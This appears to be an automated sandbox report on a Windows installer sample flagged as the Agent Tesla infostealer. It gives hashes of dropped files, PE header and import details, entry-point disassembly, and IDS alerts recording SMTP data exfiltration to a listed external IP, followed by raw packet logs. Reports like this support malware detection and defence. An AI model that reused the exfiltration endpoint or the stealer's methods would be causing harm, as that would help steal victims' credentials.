                                    | | SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe | malicious |
                                    | | SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe | malicious |
                                    | | SecuriteInfo.com.generic.ml.1686.exe | malicious |

                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                    Category:dropped
                                                                                    Size (bytes):7034
                                                                                    Entropy (8bit):7.874844124591446
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:oXR8klpIMVf8CS3YqolBYC7ulSDIgQmFPb9l:KRTlvVfTSIPlBHSHmV
                                                                                    MD5:CA6DEA86854AFA7188D36EAC6C9E88C3
                                                                                    SHA1:7A05B62C2E39DABA0F6548F159A4428F07E476CE
                                                                                    SHA-256:35F6BD6D5E34DFB89E9D55DB626A97F582B1A9DFED0DB6514BE9D2BB36674766
                                                                                    SHA-512:6CC963F7E074E4037A1092661DFD219CE1C61DA8465766D0F9D6BAE0D1B3A91AE53415C0D98E5DC1D9FB5A082F47E1EB8E48334D6CD993888E680DA4D37EA7FC
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):38632
                                                                                    Entropy (8bit):5.840976252158136
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:tba0g4rhVUkxIIaPrd6cMCP1diTLmz1BeeKH2X98VwhH:HPUkxIIaPrsCPXK6z1Bee3+k
                                                                                    MD5:ED609F8F09DE8AAA4F8CFF0285E0420A
                                                                                    SHA1:A7ADE9EB5BD4BAEFAB796C1D6EA92417F1396135
                                                                                    SHA-256:2488796ACE769813C729198CFD9E3C9D0A512168301D387BE569F2557C683821
                                                                                    SHA-512:32F080433C121FE1970BBB82911024A389E43B8B6BA059931FF0F3AFA4096BE79660C6DC9C1E027C21692D320F95896B0211C9FA0997AEC30F7A373382443FF2
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: xcVh7ZmH4Y.exe, Detection: malicious
                                                                                    Reputation:low
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):107600
                                                                                    Entropy (8bit):6.716084941250493
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:OnVDP3flBi/Rzv+bWZeail8LD3vqJID7m1dWM/ACqrLcxmTlodLRZA:6xlBM7pealD/qWmbj/ArcnFZA
                                                                                    MD5:3DC4351E49C286A5D2AAA510B0917777
                                                                                    SHA1:8B24CE404813D701AA53D92AFD892EFA1860FC02
                                                                                    SHA-256:4BD89C5A04D57746BD92264A03274791F95256FE3295A6F42820399F620730AE
                                                                                    SHA-512:54973F8B9C3EA0742BB1A520D8BFAD816E4B53AEC34C89E082B26DDC871EE63244394AF53C8C3D0DCAD85AFFC0A5FB57AD501E016ECF040AAFCA8B83E85B19E5
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                    Category:dropped
                                                                                    Size (bytes):10115
                                                                                    Entropy (8bit):7.896422756961018
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:oXRIG87sv/m1vnKaVSuKRXL55hOuf4dXL9J0LEvJyVVcuJ6Sj7YvKvtOJ:KRIjsW1vKPXBgdiWMEMj7YyvG
                                                                                    MD5:2F12A714A50993C090C94EC2672490E1
                                                                                    SHA1:4F9A319C412F1B1B251C027B1C2448BBDBB9CA6F
                                                                                    SHA-256:E759639DCCA8E96864BC82EDBACFD5BB14FE37412A6F3FCE7C82BF1BB944B6E4
                                                                                    SHA-512:2B349EAB24DCCE0DBD36433DE13E0B2A551E88A626D5C9A3F68B79E21ACDE4FC238DD4E280E30ACBB76B0EB0E08CE1ACC233AB1C9E2147E2DD01E0917B3A376B
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):37
                                                                                    Entropy (8bit):4.432294243948856
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:1HMWqYhfczC7v:1ffjv
                                                                                    MD5:F34AA87B2A4A9593506E17AE5AD7657F
                                                                                    SHA1:37DA57F785BC83EFDC442863B8E11F12B850A17F
                                                                                    SHA-256:6DF91395E1AE5EE71A11675B089F0AC4EF6330C9217022B6FEEF07E68FE65128
                                                                                    SHA-512:7EC0A371A1A765E47E9ECBB60500363F312DCBC78DAFF95B115A337F0833DE1C23ABFF4FAE8628010C1FD5FBE94EFA60D1F1A88CAE8947A79BA77BAF22CCCD7A
                                                                                    Malicious:false
                                                                                    Preview:[Exorcise]..PYROPHYLLTE=Fornrmelser..
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):12288
                                                                                    Entropy (8bit):5.814115788739565
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                    MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                    SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                    SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                    SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: xcVh7ZmH4Y.exe, Detection: malicious
                                                                                    • Filename: 3GJ6S3Kwnb.exe, Detection: malicious
                                                                                    • Filename: 3GJ6S3Kwnb.exe, Detection: malicious
                                                                                    • Filename: file.exe, Detection: malicious
                                                                                    • Filename: file.exe, Detection: malicious
                                                                                    • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious
                                                                                    • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious
                                                                                    • Filename: 7RsSycKaNc.exe, Detection: malicious
                                                                                    • Filename: 7RsSycKaNc.exe, Detection: malicious
                                                                                    • Filename: potwierdzenie wplaty.exe, Detection: malicious
                                                                                    • Filename: potwierdzenie wplaty.exe, Detection: malicious
                                                                                    • Filename: Docs advice copy.exe, Detection: malicious
                                                                                    • Filename: Docs advice copy.exe, Detection: malicious
                                                                                    • Filename: Transferencia desde ING.exe, Detection: malicious
                                                                                    • Filename: Transferencia desde ING.exe, Detection: malicious
                                                                                    • Filename: shipping document.exe, Detection: malicious
                                                                                    • Filename: shipping document.exe, Detection: malicious
                                                                                    • Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious
                                                                                    • Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious
                                                                                    • Filename: SecuriteInfo.com.generic.ml.1686.exe, Detection: malicious
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):147
                                                                                    Entropy (8bit):5.834297280344084
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
                                                                                    MD5:38D787F55E22FB591135F9250CD259D4
                                                                                    SHA1:0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
                                                                                    SHA-256:1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
                                                                                    SHA-512:4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                    Category:dropped
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):2.9216957692876595
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                                                                    MD5:1A706D20E96086886B5D00D9698E09DF
                                                                                    SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                                                                    SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                                                                    SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                                                                                    Category:modified
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):0.08231524779339361
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                    MD5:886A5F9308577FDF19279AA582D0024D
                                                                                    SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                    SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                    SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):30
                                                                                    Entropy (8bit):3.964735178725505
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                    MD5:9F754B47B351EF0FC32527B541420595
                                                                                    SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                    SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                    SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                    Malicious:false
                                                                                    Preview:NordVPN directory not found!..
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):6.199795193277217
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:xcVh7ZmH4Y.exe
                                                                                    File size:306502
                                                                                    MD5:d17d180329065df1bf54501a2c8e138b
                                                                                    SHA1:255c70621a90d6070d2585ef47eaff05c143c54a
                                                                                    SHA256:6a3b4d2025462d750011db9881bd74700cf7e2e7708398a18dfec422555ba438
                                                                                    SHA512:14652b3a013749bdeb7fe454b0cf07f4aa9d064548d6ae98369b412892e7aa1a35623d2c48f18922896d7d12bf30c57d5e23e07dc955ffe0bfc9e8b737371317
                                                                                    SSDEEP:6144:XbE/HUp8lYEkA1Jutcmjo0iHGpMrs+/llqSQZr5PoNzbC8USMxQKQ+:Xb9OYEkA1Jutcmjo0imp2s+tQSQZtPoO
                                                                                    TLSH:6054C09637C8E6F0E5A182745C79C5AB0F2A3C3BDA70591F3FD17B0F24B1260871A929
                                                                                    Icon Hash:7860e068e0fcf870
                                                                                    Entrypoint:0x40352d
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 000003F4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [ebp-14h], ebx
                                                                                    mov dword ptr [ebp-04h], 0040A2E0h
                                                                                    mov dword ptr [ebp-10h], ebx
                                                                                    call dword ptr [004080CCh]
                                                                                    mov esi, dword ptr [004080D0h]
                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                    push eax
                                                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                                                    mov dword ptr [ebp-2Ch], ebx
                                                                                    mov dword ptr [ebp-28h], ebx
                                                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                    call esi
                                                                                    test eax, eax
                                                                                    jne 00007FB5205FEC3Ah
                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                                                    push eax
                                                                                    call esi
                                                                                    mov ax, word ptr [ebp-0000012Ch]
                                                                                    mov ecx, dword ptr [ebp-00000112h]
                                                                                    sub ax, 00000053h
                                                                                    add ecx, FFFFFFD0h
                                                                                    neg ax
                                                                                    sbb eax, eax
                                                                                    mov byte ptr [ebp-26h], 00000004h
                                                                                    not eax
                                                                                    and eax, ecx
                                                                                    mov word ptr [ebp-2Ch], ax
                                                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                    jnc 00007FB5205FEC0Ah
                                                                                    and word ptr [ebp-00000132h], 0000h
                                                                                    mov eax, dword ptr [ebp-00000134h]
                                                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                                                    mov dword ptr [00434FB8h], eax
                                                                                    xor eax, eax
                                                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                                                    movzx eax, ax
                                                                                    or eax, ecx
                                                                                    xor ecx, ecx
                                                                                    mov ch, byte ptr [ebp-2Ch]
                                                                                    movzx ecx, cx
                                                                                    shl eax, 10h
                                                                                    or eax, ecx
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x28500 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x36000 | 0x2e000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x64000 | 0x28500 | 0x28600 | False | 0.275118517802 | data | 4.14455193293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x64358 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x74b80 | 0x94a8 | data | English | United States
RT_ICON | 0x7e028 | 0x5488 | data | English | United States
RT_ICON | 0x834b0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65535, next used block 4294909696 | English | United States
RT_ICON | 0x876d8 | 0x25a8 | data | English | United States
RT_ICON | 0x89c80 | 0x10a8 | data | English | United States
RT_ICON | 0x8ad28 | 0x988 | data | English | United States
RT_ICON | 0x8b6b0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x8bb18 | 0x120 | data | English | United States
RT_DIALOG | 0x8bc38 | 0x11c | data | English | United States
RT_DIALOG | 0x8bd58 | 0xc4 | data | English | United States
RT_DIALOG | 0x8be20 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x8be80 | 0x76 | data | English | United States
RT_VERSION | 0x8bef8 | 0x2c8 | data | English | United States
RT_MANIFEST | 0x8c1c0 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Description | Data
LegalCopyright | Mediatronic Pty Ltd
FileVersion | 4.31.18
CompanyName | Molex Incorporated
LegalTrademarks | Household International Corp.
Comments | Volt Information Sciences Inc
ProductName | ESET
FileDescription | Sprint Corp.
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/10/22-22:12:51.209096 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49771 | 587 | 192.168.11.20 | 77.246.191.210
05/10/22-22:12:51.209113 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49771 | 587 | 192.168.11.20 | 77.246.191.210
05/10/22-22:12:47.103829 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49769 | 587 | 192.168.11.20 | 77.246.191.210
05/10/22-22:12:47.103924 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49769 | 587 | 192.168.11.20 | 77.246.191.210
05/10/22-22:12:47.103829 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49769 | 587 | 192.168.11.20 | 77.246.191.210
05/10/22-22:12:51.209096 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49771 | 587 | 192.168.11.20 | 77.246.191.210
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    May 10, 2022 22:11:05.484009027 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.484436035 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.484621048 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.484657049 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.484882116 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.484931946 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.485100031 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.485390902 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.485536098 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.485568047 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.485780001 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.485829115 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.486031055 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.486280918 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.486426115 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.486457109 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.486680984 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.486731052 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.486876965 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.487171888 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.487327099 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.487360954 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.487507105 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.487544060 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.487695932 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.487903118 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.488064051 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.488101006 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.488270998 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.488301039 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.488421917 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.488467932 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.488502979 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.488596916 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.488643885 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.488843918 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.489000082 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.489038944 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.489232063 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.489268064 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.489415884 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.489453077 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.489613056 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.489676952 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.489890099 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.489923000 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.490071058 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.490108013 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.490251064 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.490284920 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.490431070 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.490556002 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.490701914 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.490742922 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.490889072 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.490921974 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.491075993 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.491111994 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.491260052 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.491350889 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.491528988 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.491560936 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.491708040 CEST49756443192.168.11.20142.250.185.193
